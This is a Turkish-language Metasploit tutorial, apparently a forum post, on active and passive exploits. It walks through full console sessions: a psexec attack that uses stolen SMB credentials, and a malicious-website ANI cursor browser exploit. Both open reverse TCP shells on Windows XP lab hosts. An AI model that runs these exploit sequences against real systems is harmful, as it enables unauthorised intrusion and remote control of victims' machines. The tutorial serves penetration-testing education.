Metasploit Çerçevesindeki tüm istismarlar iki kategoriye ayrılacaktır;
Aktif ve Pasif Olmak üzere
Aktif ve Pasif Olmak üzere
Aktif İstismarlar
Etkin istismarlar belirli bir ana bilgisayardan yararlanır, tamamlanana kadar çalışır ve ardından çıkar.
- Kaba kuvvet modülleri, kurbandan bir kabuk açıldığında çıkacaktır.
- Bir hatayla karşılaşılırsa modül yürütmesi durur.
- Exploit komutuna '-j' ileterek aktif bir modülü arka plana zorlayabilirsiniz:
Kod:
msf exploit(ms08_067_netapi) > exploit -j
[*] Exploit running as background job.
msf exploit(ms08_067_netapi) >
Örnek
Aşağıdaki örnek, hedef sistemde bir ters kabuktan yararlanmak ve elde etmek için önceden edinilmiş bir kimlik bilgilerini kullanır.
Kod:
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.1.100
RHOST => 192.168.1.100
msf exploit(psexec) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf exploit(psexec) > set LPORT 4444
LPORT => 4444
msf exploit(psexec) > set SMBUSER victim
SMBUSER => victim
msf exploit(psexec) > set SMBPASS s3cr3t
SMBPASS => s3cr3t
msf exploit(psexec) > exploit
[*] Connecting to the server...
[*] Started reverse handler
[*] Authenticating as user 'victim'...
[*] Uploading payload...
[*] Created \hikmEeEM.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (ciWyCVEp - "MXAVZsCqfRtZwScLdexnD")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \hikmEeEM.exe...
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.1.5:4444 -> 192.168.1.100:1073)
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
Pasif İstismarlar
Pasif istismarlar, gelen ana bilgisayarları bekler ve bağlanırken onları kullanır.
- Pasif istismarlar neredeyse her zaman web tarayıcıları, FTP istemcileri vb. gibi istemcilere odaklanır.
- Ayrıca, bağlantı bekleyen e-posta açıklarıyla birlikte kullanılabilirler.
- Pasif açıklardan yararlanmalar, kabukları olduğu gibi bildirir, session komutuna '-l' iletilerek numaralandırılabilir. '-i' geçmek bir kabuk ile etkileşime girecektir.
Kod:
msf exploit(ani_loadimage_chunksize) > sessions -l
Active sessions
===============
Id Description Tunnel
-- ----------- ------
1 Meterpreter 192.168.1.5:52647 -> 192.168.1.100:4444
msf exploit(ani_loadimage_chunksize) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
Örnek
Aşağıdaki çıktı, animasyonlu imleç güvenlik açığından yararlanma kurulumunu gösterir. Bir kurban kötü niyetli web sitemize göz atana kadar istismar tetiklenmez.
Kod:
msf > use exploit/windows/browser/ani_loadimage_chunksize
msf exploit(ani_loadimage_chunksize) > set URIPATH /
URIPATH => /
msf exploit(ani_loadimage_chunksize) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(ani_loadimage_chunksize) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf exploit(ani_loadimage_chunksize) > set LPORT 4444
LPORT => 4444
msf exploit(ani_loadimage_chunksize) > exploit
[*] Exploit running as background job.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.1.5:8080/
[*] Server started.
msf exploit(ani_loadimage_chunksize) >
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending HTML page to 192.168.1.100:1077...
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP) to 192.168.1.100:1077...
[*] Sending stage (240 bytes)
[*] Command shell session 2 opened (192.168.1.5:4444 -> 192.168.1.100:1078)
msf exploit(ani_loadimage_chunksize) > sessions -i 2
[*] Starting interaction with 2...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\victim\Desktop>
Saygılarımla...